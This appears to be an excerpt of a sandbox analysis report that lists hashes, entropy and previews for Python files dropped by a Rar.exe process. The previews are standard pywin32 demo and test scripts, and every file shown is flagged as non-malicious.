                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- Mode: Python; tab-width: 4 -*-.#..# This module, and the timer.pyd core timer support, were written by.# Sam Rushing (rushing@nightmare.com)..import time..# Timers are based on Windows messages. So we need.# to do the event-loop thing!.import timer.import win32event.import win32gui..# glork holds a simple counter for us....class glork:. def __init__(self, delay=1000, max=10):. self.x = 0. self.max = max. self.id = timer.set_timer(delay, self.increment). # Could use the threading module, but this is. # a win32 extension test after all! :-). self.event = win32event.CreateEvent(None, 0, 0, None).. def increment(self, id, time):. print("x = %d" % self.x). self.x = self.x + 1. # if we've reached the max count,. # kill off the timer.. if self.x > self.max:. # we could have used 'self.id' here, too. timer.kill_timer(id). win32event.SetEvent(self.event)...# create a counte
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4666
                                                                                                                                                                                                                                  Entropy (8bit):4.668774222762782
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:SvkHtf4HomAM/yjHGnav57yjKATlbbnonaYBPYbhkw9zCa/qSbNzw1z:S+f4Im3cGn67P43onYhL9vVxs
                                                                                                                                                                                                                                  MD5:DB58629AA113EDAC46DE260EBFBAD2BE
                                                                                                                                                                                                                                  SHA1:3C51C981260093C562341E841C532C315F333C8C
                                                                                                                                                                                                                                  SHA-256:D8492408E4957D3AA6C2F828E516537A5001890243BDF1F07570D22EA070CEDF
                                                                                                                                                                                                                                  SHA-512:FEB1C5F901E6E6CF1E1C5E0F98C5FC545EF2590CB3406C34CF2A774A46002571E5C1C6A36A3F5A0D544BB594333776653B1E8C6CF1B12AF9BFB6C805CF8295CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# win32clipboardDemo.py.#.# Demo/test of the win32clipboard module...import win32con.from pywin32_testutil import str2bytes # py3k-friendly helper.from win32clipboard import *..if not __debug__:. print("WARNING: The test code in this module uses assert"). print("This instance of Python has asserts disabled, so many tests will be skipped")..cf_names = {}.# Build map of CF_* constants to names..for name, val in list(win32con.__dict__.items()):. if name[:3] == "CF_" and name != "CF_SCREENFONTS": # CF_SCREEN_FONTS==CF_TEXT!?!?. cf_names[val] = name...def TestEmptyClipboard():. OpenClipboard(). try:. EmptyClipboard(). assert (. EnumClipboardFormats(0) == 0. ), "Clipboard formats were available after emptying it!". finally:. CloseClipboard()...def TestText():. OpenClipboard(). try:. text = "Hello from Python". text_bytes = str2bytes(text). SetClipboardText(text). got = GetClipboardData(win32co
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3905
                                                                                                                                                                                                                                  Entropy (8bit):4.396194918375346
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:iOMbbuK52jUCVYqT7jQ3eGi+KL44cd12xXtACc2eGzqQ3mRsG4m:ihbbeBVN7jyi+KU4Ju2usGv
                                                                                                                                                                                                                                  MD5:258A699983426F66EB6440D4B1E0D34E
                                                                                                                                                                                                                                  SHA1:026B32F8A76C1B6F955EAB426AE3597ED4FCDF09
                                                                                                                                                                                                                                  SHA-256:905279066C8F55C7BC6376D4B583918BB5CEE1547E37B8328245112EA1155C1B
                                                                                                                                                                                                                                  SHA-512:F3DC2BC0EEBA1B3812AA9BF7FB16D2F882FE252E718219C88628E0BE10247156733A09F6928C9044760A0492906E490A286FC1084CCAD5BF0ABC09B37E491E8B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32clipboard.import win32con.import win32gui...class ViewerWindow:. def __init__(self):. self.hwndNextViewer = None.. def OnPaint(self, hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). wndrect = win32gui.GetClientRect(hwnd). wndwidth = wndrect[2] - wndrect[0]. wndheight = wndrect[3] - wndrect[1]. win32clipboard.OpenClipboard(). try:. try:. hbitmap = win32clipboard.GetClipboardData(win32clipboard.CF_BITMAP). except TypeError:. font = win32gui.LOGFONT(). font.lfHeight = 15 # int(wndheight/20). font.lfWidth = 15 # font.lfHeight. # font.lfWeight=150. hf = win32gui.CreateFontIndirect(font). win32gui.SelectObject(dc, hf). win32gui.SetBkMode(dc, win32con.TRANSPARENT). win32gui.SetTextColor(dc, win32api.RGB(0, 0, 0)). win32gu
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5536
                                                                                                                                                                                                                                  Entropy (8bit):4.562610287492588
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:LAmlRZGu6O+K3Yf5ssjT0ALmjgriErdNTm5GD+TtXN4Brr:LybK3YhssPDKjgriEr3i5/tdk/
                                                                                                                                                                                                                                  MD5:3A3B78735045BCDA323C1454A8A6524F
                                                                                                                                                                                                                                  SHA1:2E9A0AB51D615E7717C8ED3A51A8AA24D3975F5C
                                                                                                                                                                                                                                  SHA-256:5E8F4A7A26DF3EECFABAF58DF88E291C1A90EC87DCB40C51123E006832C82D89
                                                                                                                                                                                                                                  SHA-512:235B679DCE556F5F9CCBDF995EDDCC43019098284B9D8342CA1940F6BBBEE658148AD519B3E29BF70490E1B3521242F5CC1BD03B977F4D760FF89A1EFFE0E0A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a simple serial port terminal demo..#.# Its primary purpose is to demonstrate the native serial port access offered via.# win32file...# It uses 3 threads:.# - The main thread, which cranks up the other 2 threads, then simply waits for them to exit..# - The user-input thread - blocks waiting for a keyboard character, and when found sends it.# out the COM port. If the character is Ctrl+C, it stops, signalling the COM port thread to stop..# - The COM port thread is simply listening for input on the COM port, and prints it to the screen...# This demo uses userlapped IO, so that none of the read or write operations actually block (however,.# in this sample, the very next thing we do _is_ block - so it shows off the concepts even though it.# doesnt exploit them...import msvcrt # For the getch() function..import sys.import threading..import win32con # constants..from win32event import * # We use events and the WaitFor[Multiple]Objects functions..from win32file import * # The
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5109
                                                                                                                                                                                                                                  Entropy (8bit):4.7421972636330745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:fJUKEFxFgO1PPfJM7FxFgyFtF9VCFGFJFxFZFtFuFHFSFr:nE75fG77Wyv9Cg/3PbgFsR
                                                                                                                                                                                                                                  MD5:867D26ABCB67E383F5648184D67E050B
                                                                                                                                                                                                                                  SHA1:B7030E5399DA5BD59F903CB050D8812346C4BEAB
                                                                                                                                                                                                                                  SHA-256:5361F5BF72F2598DCB4D505A1C74D969A12A96EF80FA14F00AB8E1FD63AF2152
                                                                                                                                                                                                                                  SHA-512:A8BD3C68FF367C9036A8A20A15465E3404A646F5639D8AE30E14335C72C511E008816A0325FE40C4FC37A662FC6B894AFFBC01AC248FF98A482056A8CF53CFC2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import time..import win32con.import win32console..virtual_keys = {}.for k, v in list(win32con.__dict__.items()):. if k.startswith("VK_"):. virtual_keys[v] = k..free_console = True.try:. win32console.AllocConsole().except win32console.error as exc:. if exc.winerror != 5:. raise. ## only free console if one was created successfully. free_console = False..stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE).stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE).newbuffer = win32console.CreateConsoleScreenBuffer().newbuffer.SetConsoleActiveScreenBuffer().newbuffer.SetConsoleTextAttribute(. win32console.FOREGROUND_RED. | win32console.FOREGROUND_INTENSITY. | win32console.BACKGROUND_GREEN. | win32console.BACKGROUND_INTENSITY.).newbuffer.WriteConsole("This is a new screen buffer\n")..## test setting screen buffer and window size.## screen buffer size cannot be smaller than window size.window_size = newbuffer.GetConsoleScreenBuffe
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2747
                                                                                                                                                                                                                                  Entropy (8bit):5.085452982327908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:cfg1SDMmh+nJ2e5bke5RnBzgm5go7Nke4VeLWeNPRLe712kDACXjLtPCPpyDku+h:kg1dgoJ22kPo7qlVeWYPRLk1PDACzpCb
                                                                                                                                                                                                                                  MD5:B2DD13257D87B2D861BAD12F9BE7D17B
                                                                                                                                                                                                                                  SHA1:B48DFABE4E44059CF9DDB076382928CA891189D3
                                                                                                                                                                                                                                  SHA-256:E68685BDC90CC014E4AA3BA4F6FC988E945F576A35DEB2BFFD1C69B06C30F7F8
                                                                                                                                                                                                                                  SHA-512:3A59D0B5DCBFB5C325338B5BFD398E2E289805D2B2C3B43DE7DD2951D1A1444C032CDE2EA2F962B01EC93BB49279064269DF07BCA24DEF9160418C2E0A5852E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Demonstrates prompting for credentials, saving, and loggging on with marshalled credential..Also shows how to load user's profile."""..import win32api.import win32con.import win32cred.import win32net.import win32profile.import win32security..## Prompt for a username/pwd for local computer.uiinfo = {. "MessageText": "Enter credentials for local machine",. "CaptionText": "win32cred_demo.py",.}.target, pwd, save = win32cred.CredUIPromptForCredentials(. TargetName=win32api.GetComputerName(),. AuthError=0,. Flags=win32cred.CREDUI_FLAGS_DO_NOT_PERSIST. | win32cred.CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX,. Save=False,. UiInfo=uiinfo,.)..attrs = [. {"Keyword": "attr1", "Flags": 0, "Value": "unicode data"},. {"Keyword": "attr2", "Flags": 0, "Value": b"character data"},.].cred = {. "Comment": "Created by win32cred_demo.py",. "UserName": target,. "TargetAlias": None,. "TargetName": target,. "CredentialBlob": pwd,. "Flags": win32cred.CRED_FLAGS_USERNAME
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1381
                                                                                                                                                                                                                                  Entropy (8bit):4.808237224456068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qIRznj1ZjkzgY87MNgghZU+7Vx/YhVwfTDw/LsnOEw3a5dDTVtpYPGPdDTG/b1db:dLkz0gNghK/vfTkPK/Vr0bHh7Os
                                                                                                                                                                                                                                  MD5:E7B5B82C93BC5D6291AE5E98FEFE6773
                                                                                                                                                                                                                                  SHA1:277255439133F6941FCB2BEBEBFFC3020AB9DEBA
                                                                                                                                                                                                                                  SHA-256:4D203DB1FC60406DAAD07C19BDFA3F52A71B7D16E25BA0D56CCCD2818497AD87
                                                                                                                                                                                                                                  SHA-512:6C0BE979ED9D3B394244679413F7C5EDAD3D4309417B5E1AD82273AE2E2668BBE05407298BBD3A9BEEC85D6A7B3F3D92DDE37009E86588CD7CEF37E17EC56816
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a "demo" of win32file - it used to be more a test case than a.# demo, so has been moved to the test directory...import os..# Please contribute your favourite simple little demo..import win32api.import win32con.import win32file...# A very simple demo - note that this does no more than you can do with.# builtin Python file objects, so for something as simple as this, you.# generally *should* use builtin Python objects. Only use win32file etc.# when you need win32 specific features not available in Python..def SimpleFileDemo():. testName = os.path.join(win32api.GetTempPath(), "win32file_demo_test_file"). if os.path.exists(testName):. os.unlink(testName). # Open the file for writing.. handle = win32file.CreateFile(. testName, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None. ). test_data = "Hello\0there".encode("ascii"). win32file.WriteFile(handle, test_data). handle.Close(). # Open it for reading.. handle = win32file.Cre
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5028
                                                                                                                                                                                                                                  Entropy (8bit):4.86015472894631
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:otvodpuc/LMExtDYu57+AJATWADoFpW2b/IL2JeieSvqE:Kvvc/Ljl5TFpW2b/IL2JeieSvqE
                                                                                                                                                                                                                                  MD5:B8AB179A28507872DFD508DF57A317E7
                                                                                                                                                                                                                                  SHA1:CB997291BEBC67B828994AEDED8944D25CF66445
                                                                                                                                                                                                                                  SHA-256:4619866C59EEF14BDB582B8A48CC18CCD75E67C2F64913C805B5A3C930BB2C4B
                                                                                                                                                                                                                                  SHA-512:21008AA2DD1695D584694C0E5D59DF0A341DA592D12FCD44F70F754F22D999BEA2A96B5AE735724EC21A9BC72E20DF7EE31824D2101F8036BF66396BAF3AA9C5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# The start of a win32gui generic demo..# Feel free to contribute more demos back ;-)..import math.import random.import time..import win32api.import win32con.import win32gui...def _MyCallback(hwnd, extra):. hwnds, classes = extra. hwnds.append(hwnd). classes[win32gui.GetClassName(hwnd)] = 1...def TestEnumWindows():. windows = []. classes = {}. win32gui.EnumWindows(_MyCallback, (windows, classes)). print(. "Enumerated a total of %d windows with %d classes". % (len(windows), len(classes)). ). if "tooltips_class32" not in classes:. print("Hrmmmm - I'm very surprised to not find a 'tooltips_class32' class.")...def OnPaint_1(hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). win32gui.SetGraphicsMode(dc, win32con.GM_ADVANCED). br = win32gui.CreateSolidBrush(win32api.RGB(255, 0, 0)). win32gui.SelectObject(dc, br). angle = win32gui.GetWindowLong(hwnd, win32con.GWL_USERDATA). win32gui.SetWindowLong(hwnd, win32con.GWL_USERDA
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3829
                                                                                                                                                                                                                                  Entropy (8bit):5.010125673110548
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:quG+AnP3C0axcdbC6DemA2FqcxD2/nccvjXHVFKOw/mo5GyG0:quEPSXOG6DemA2Fq47U7HVFxw/mw/
                                                                                                                                                                                                                                  MD5:F78AB5C17E8D69884B433067B37A478A
                                                                                                                                                                                                                                  SHA1:F390AF6B0116C94F3C837C54437109D91A4E3074
                                                                                                                                                                                                                                  SHA-256:3D09EAC656558AB7799B73B83AF3F3CA14756296B93269CE6DD9A20EBAC61E95
                                                                                                                                                                                                                                  SHA-512:ED028D0514998FD26BCEE418234872A82014506EBE494F782D6AA094F59E7D1894004EB463373DCA9E0349C5E3FD79E2EB52AA9669D4943C3058333C9A7FD9C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demo RegisterDeviceNotification etc. Creates a hidden window to receive.# notifications. See serviceEvents.py for an example of a service doing.# that..import sys.import time..import win32api.import win32con.import win32file.import win32gui.import win32gui_struct.import winnt..# These device GUIDs are from Ioevent.h in the Windows SDK. Ideally they.# could be collected somewhere for pywin32....GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...# WM_DEVICECHANGE message handler..def OnDeviceChange(hwnd, msg, wp, lp):. # Unpack the 'lp' into the appropriate DEV_BROADCAST_* structure,. # using the self-identifying data inside the DEV_BROADCAST_HDR.. info = win32gui_struct.UnpackDEV_BROADCAST(lp). print("Device change notification:", wp, str(info)). if (. wp == win32con.DBT_DEVICEQUERYREMOVE. and info.devicetype == win32con.DBT_DEVTYP_HANDLE. ):. # Our handle is stored away in the structure - just close it. print("De
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15720
                                                                                                                                                                                                                                  Entropy (8bit):4.774516514388496
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:lptehicVSsdWi2Glkdqfn9NvWevP2RkypmcZJeA:lHuiYn/+7RWcZJeA
                                                                                                                                                                                                                                  MD5:7FE3A04708C7BFC598956C5E83EF9031
                                                                                                                                                                                                                                  SHA1:1A01D40A3DFAD3D6B8B14570CCCB92B7DBAE4F20
                                                                                                                                                                                                                                  SHA-256:95D3AC68ED6E7E5770E33AF40A1A6FD2A805EE9223D53624ED42FD6AEDAE0FAA
                                                                                                                                                                                                                                  SHA-512:6241EDA928BF49A34049818555A4F9897ADFA894612B1285463FC28DEC0A2AD387051DB02E002109AB8A675C1F7287E1908F67D1213F2F438CC5CEB190E507F7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo of a fairly complex dialog..#.# Features:.# * Uses a "dynamic dialog resource" to build the dialog..# * Uses a ListView control..# * Dynamically resizes content..# * Uses a second worker thread to fill the list..# * Demostrates support for windows XP themes...# If you are on Windows XP, and specify a '--noxp' argument, you will see:.# * alpha-blend issues with icons.# * The buttons are "old" style, rather than based on the XP theme..# Hence, using:.# import winxpgui as win32gui.# is recommended..# Please report any problems..import sys..if "--noxp" in sys.argv:. import win32gui.else:. import winxpgui as win32gui..import array.import os.import queue.import struct..import commctrl.import win32api.import win32con.import win32gui_struct.import winerror..IDC_SEARCHTEXT = 1024.IDC_BUTTON_SEARCH = 1025.IDC_BUTTON_DISPLAY = 1026.IDC_LISTBOX = 1027..WM_SEARCH_RESULT = win32con.WM_USER + 512.WM_SEARCH_FINISHED = win32con.WM_USER + 513...class _WIN32MASKEDSTRUCT:. def __init__
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16112
                                                                                                                                                                                                                                  Entropy (8bit):4.611080780743955
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:kIV+2THm+d4iG1UGf2HmlL16Idc8uITjPjvfEEgIBXFNXIDz29AJ5JSIbB6BOnUy:kGHLy1UNmlLQkgEgI1SzMI5LbB6BOv
                                                                                                                                                                                                                                  MD5:2DD553D7A4EB19590D28DB62428B4D46
                                                                                                                                                                                                                                  SHA1:B391B8AFAE0A41869680637C0C2D549787B2A244
                                                                                                                                                                                                                                  SHA-256:6F6DF0AEDB7AE4CC0DA6A063CBB8A94A1333A0650B0DD016B20CCE37C9BAA7D8
                                                                                                                                                                                                                                  SHA-512:675A5D0192ED09F1FB8882BFEEAC907B75B0F61E53B1B0BE11B8E502BD417966AC79858706B32B088BA668B8BCE2B6CCFB0D70497291A6C67F7D4CCB2BB2C306
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demonstrates some advanced menu concepts using win32gui..# This creates a taskbar icon which has some fancy menus (but note that.# selecting the menu items does nothing useful - see win32gui_taskbar.py.# for examples of this...# NOTE: This is a work in progress. Todo:.# * The "Checked" menu items don't work correctly - I'm not sure why..# * No support for GetMenuItemInfo...# Based on Andy McKay's demo code..from win32api import *..# Try and use XP features, so we get alpha-blending etc..try:. from winxpgui import *.except ImportError:. from win32gui import *..import array.import os.import struct.import sys..import win32con.from win32gui_struct import *..this_dir = os.path.split(sys.argv[0])[0]...class MainWindow:. def __init__(self):. message_map = {. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. # owner-draw related handlers.. win32con.W
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5206
                                                                                                                                                                                                                                  Entropy (8bit):4.754958557193041
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:T9gvS0tVbYFk45y2aR6tgHtZGtX8kemI4sBKzmrHIwi:B+tVq7Y2aRHwvI4sQzvwi
                                                                                                                                                                                                                                  MD5:BD7764F8D17FFCA4629B558458642734
                                                                                                                                                                                                                                  SHA1:AD2FFDCE97F8A154C6809CA6EA9376CE5DAEBFB3
                                                                                                                                                                                                                                  SHA-256:3203AB7E1D178EFBFA1AB964B3A010884E6BD86720DD0F55A6DC9D1243F49F5E
                                                                                                                                                                                                                                  SHA-512:BFF7B59948A1D044CBB311728C95F58E28EE3E177164650BEAE232DB100E3898BA82B538852A139A2621ADB48F2BF0754332B3B506AE5E9A801A04141971EF53
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Creates a task-bar icon. Run from Python.exe to see the.# messages printed..import os.import sys..import win32api.import win32con.import win32gui.import winerror...class MainWindow:. def __init__(self):. msg_TaskbarRestart = win32gui.RegisterWindowMessage("TaskbarCreated"). message_map = {. msg_TaskbarRestart: self.OnRestart,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. }. # Register the Window class.. wc = win32gui.WNDCLASS(). hinst = wc.hInstance = win32api.GetModuleHandle(None). wc.lpszClassName = "PythonTaskbarDemo". wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW. wc.hCursor = win32api.LoadCursor(0, win32con.IDC_ARROW). wc.hbrBackground = win32con.COLOR_WINDOW. wc.lpfnWndProc = message_map # could also specify a wndproc... # Don't blow up if class already registered
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8984
                                                                                                                                                                                                                                  Entropy (8bit):4.399025941579387
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ITaxEtPTFlOLG2zaBxuzJJXKz2MP7EKavZ8ozm/9UOGHjm35lmSV7b66wN6ChcEi:ImxEZTSEMT+28Fonw9x9ljYp1XC/Wxli
                                                                                                                                                                                                                                  MD5:380BD910ADE57D5EED72B6D8CE27AF8C
                                                                                                                                                                                                                                  SHA1:AF570E6EACEC750D47905AD0ED08A3BFC3B916A5
                                                                                                                                                                                                                                  SHA-256:04E8DC68E6C79B52F87B0AB5A1F4112AB57BFFCFB4C57D3D2D645623C23D665B
                                                                                                                                                                                                                                  SHA-512:93C47071AAF180C5F4E0A6BF9BF581F7EE8593F23933450C0A06D60DEC3DB03974EE9472AD3E2899975336633BAC4A69698B91BB8A22CE2701A3D7E02460A802
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import getopt.import sys.import traceback..import win32api.import win32net.import win32netcon.import win32security..verbose_level = 0..server = None # Run on local machine....def verbose(msg):. if verbose_level:. print(msg)...def CreateUser():. "Creates a new test user, then deletes the user". testName = "PyNetTestUser". try:. win32net.NetUserDel(server, testName). print("Warning - deleted user before creating it!"). except win32net.error:. pass.. d = {}. d["name"] = testName. d["password"] = "deleteme". d["priv"] = win32netcon.USER_PRIV_USER. d["comment"] = "Delete me - created by Python test code". d["flags"] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT. win32net.NetUserAdd(server, 1, d). try:. try:. win32net.NetUserChangePassword(server, testName, "wrong", "new"). print("ERROR: NetUserChangePassword worked with a wrong password!"). except win32net.error:. pas
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2809
                                                                                                                                                                                                                                  Entropy (8bit):4.910903276980213
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:qv5dZhR3kNn5VCOYPy4GQ+zSO3I6fmBUDNiKjt6kOVp1JqUTD:qlR3e5Va64GQW3IUEUDN/ckkwUv
                                                                                                                                                                                                                                  MD5:CD8D88B9E04BD140A2CE1C48E899A250
                                                                                                                                                                                                                                  SHA1:7AE9354E81A559AE2C28E624BF2419CE12F6933D
                                                                                                                                                                                                                                  SHA-256:70D08CC0A5E47530DA0E45F975264B795A8473B6A2646593041F527DC2661CA0
                                                                                                                                                                                                                                  SHA-512:6E1E5EB57AF9AD39B51B01EC6CD0A923615B80C5D5D4490792057B3C551050B16C8584196B058E6DB48616F195552332534DD758AA5D99E062C8919D2379652C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo of the win32rcparser module and using win32gui..import os..import commctrl.import win32api.import win32con.import win32gui.import win32rcparser..this_dir = os.path.abspath(os.path.dirname(__file__)).g_rcname = os.path.abspath(. os.path.join(this_dir, "..", "test", "win32rcparser", "test.rc").)..if not os.path.isfile(g_rcname):. raise RuntimeError("Can't locate test.rc (should be at '%s')" % (g_rcname,))...class DemoWindow:. def __init__(self, dlg_template):. self.dlg_template = dlg_template.. def CreateWindow(self):. self._DoCreate(win32gui.CreateDialogIndirect).. def DoModal(self):. return self._DoCreate(win32gui.DialogBoxIndirect).. def _DoCreate(self, fn):. message_map = {. win32con.WM_INITDIALOG: self.OnInitDialog,. win32con.WM_CLOSE: self.OnClose,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. }. return fn(0, self.dlg_template, 0, message_m
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):579
                                                                                                                                                                                                                                  Entropy (8bit):4.864055610075746
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:4L/LeAgAYADWcC1DuJ4ilQw+47lgrwS4pLpvn:dAtCceDuJrQd4pQn4pLpvn
                                                                                                                                                                                                                                  MD5:EE907338D6390DF677EB03E8B8EC1086
                                                                                                                                                                                                                                  SHA1:E374C563078378EC5C4F69797569ACBFFEB0D51B
                                                                                                                                                                                                                                  SHA-256:8B4ED673B62CF16AE39C308739A39C3B14BB3B567E85CE59224451041D0F5EEC
                                                                                                                                                                                                                                  SHA-512:48D03393639F46EFAFAA42A22430AD9056D35C943FDD84C235A37C0774C95DB26CD5F07E0582753DC051E81AC56744980A7260DE8BBCCE7A0B3327CAC2BA9412
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32con.import win32service...def EnumServices():. resume = 0. accessSCM = win32con.GENERIC_READ. accessSrv = win32service.SC_MANAGER_ALL_ACCESS.. # Open Service Control Manager. hscm = win32service.OpenSCManager(None, None, accessSCM).. # Enumerate Service Control Manager DB.. typeFilter = win32service.SERVICE_WIN32. stateFilter = win32service.SERVICE_STATE_ALL.. statuses = win32service.EnumServicesStatus(hscm, typeFilter, stateFilter). for short_name, desc, status in statuses:. print(short_name, desc, status)...EnumServices().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):982
                                                                                                                                                                                                                                  Entropy (8bit):4.754642610339019
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:SIGvZ5wLuzL7SZBqSKBkd9ovyNl3gfFyuxU2NYT4oan0ux/9duzU7gflQlyqTkd4:GvZ5VSZISVdOyaNn06dT0flQAdyCYsL6
                                                                                                                                                                                                                                  MD5:0C05782F9271A7CC8A5C02ECC2038C5C
                                                                                                                                                                                                                                  SHA1:2939D4168D724A07F9B9DDCFF507A33F208FE2A1
                                                                                                                                                                                                                                  SHA-256:28E8F3FAF3572494B50DB3B26A200F7A8589AC135CA8A8661AC3FCA999CC2A00
                                                                                                                                                                                                                                  SHA-512:84CA26CD7A55D2427C96400B90E2C781786C68396A7E240CA7A2F212894CB44B12F4BBDC4F57B9772628A7C204AD6F2039B1D22D4DE867DB3C3ED4C941275912
                                                                                                                                                                                                                                  Malicious:false
